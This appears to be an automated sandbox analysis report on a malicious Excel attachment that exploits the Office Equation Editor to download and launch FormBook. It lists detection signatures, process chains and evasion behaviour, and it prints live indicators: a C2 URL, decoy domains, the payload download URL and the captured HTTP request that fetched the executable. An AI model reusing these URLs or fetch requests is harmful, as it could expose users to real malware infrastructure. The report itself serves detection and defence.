Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Sample Name: PO 65738963578 Revise Settlement.xlsx
Analysis ID: 626146
MD5: e5c9c992c088a778a6348f4a58dd78d3
SHA1: 754f386df06785ddd4cb4a04bed626ceab65d5ab
SHA256: 6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

AV Detection

Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}
Source: PO 65738963578 Revise Settlement.xlsx Virustotal: Detection: 41%
Source: PO 65738963578 Revise Settlement.xlsx ReversingLabs: Detection: 29%
Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: www.cortesdisenosroutercnc.com/itq4/ Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeC: Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeiiC: Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exej Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exe Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: 2.3.EQNEDT32.EXE.998472.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.931118.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.998472.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.EQNEDT32.EXE.931118.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.idcqz.exe.160000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.12.81.20 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379043F ShellExecuteW,ExitProcess, 2_2_0379043F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790411 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790411
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037902FD ExitProcess, 2_2_037902FD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903BC URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790332 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790332
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379042A ShellExecuteW,ExitProcess, 2_2_0379042A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790464 ExitProcess, 2_2_03790464
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03790316 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03790316
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

Networking

Source: Malware configuration extractor URLs: www.cortesdisenosroutercnc.com/itq4/
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View IP Address: 198.12.81.20
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:42:02 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17Last-Modified: Fri, 13 May 2022 11:21:13 GMTETag: "3e719-5dee2df4306a6"Accept-Ranges: bytesContent-Length: 255769Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exe
Source: EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://198.12.81.20/busy/BUSY.exej
Source: EQNEDT32.EXE, 00000002.00000003.957494354.0000000000955000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.959904121.000000000040A000.00000008.00000001.01000000.00000004.sdmp, BUSY[1].exe.2.dr, vbc.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8559C53.emf
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040580F

E-Banking Fraud

Source: Yara match File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: 2.2.EQNEDT32.EXE.931118.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 2.3.EQNEDT32.EXE.931118.1.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EQNEDT32.EXE.931118.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B51890 5_2_00B51890
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B596A0 5_2_00B596A0
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B57E88 5_2_00B57E88
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B59C12 5_2_00B59C12
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5C3BD 5_2_00B5C3BD
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5A184 5_2_00B5A184
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5B3F1 5_2_00B5B3F1
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00110A56 5_2_00110A56
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Memory allocated: 77740000 page execute and read and write
Source: PO 65738963578 Revise Settlement.xlsx Virustotal: Detection: 41%
Source: PO 65738963578 Revise Settlement.xlsx ReversingLabs: Detection: 29%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PO 65738963578 Revise Settlement.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/16@0/1
Source: C:\Users\Public\vbc.exe Code function: 4_2_004021AA CoCreateInstance, 4_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 4_2_00404ABB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B52445 push ecx; ret 5_2_00B52458
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\idcqz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_037903A2

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B51890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_00B51890
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 544 Thread sleep time: -420000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe API call chain: ExitProcess graph end node
Source: vbc.exe, 00000004.00000002.984898128.0000000000944000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B57A95 IsDebuggerPresent, 5_2_00B57A95
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 5_2_00B5558A
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B586ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 5_2_00B586ED
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0379046B mov edx, dword ptr fs:[00000030h] 2_2_0379046B
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h] 5_2_0011061D
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h] 5_2_001106F7
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h] 5_2_00110736
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h] 5_2_00110772
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h] 5_2_001103F8
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B5439B SetUnhandledExceptionFilter, 5_2_00B5439B
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B543CC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00B543CC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Process created: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
Source: C:\Users\user\AppData\Local\Temp\idcqz.exe Code function: 5_2_00B53283 cpuid 5_2_00B53283
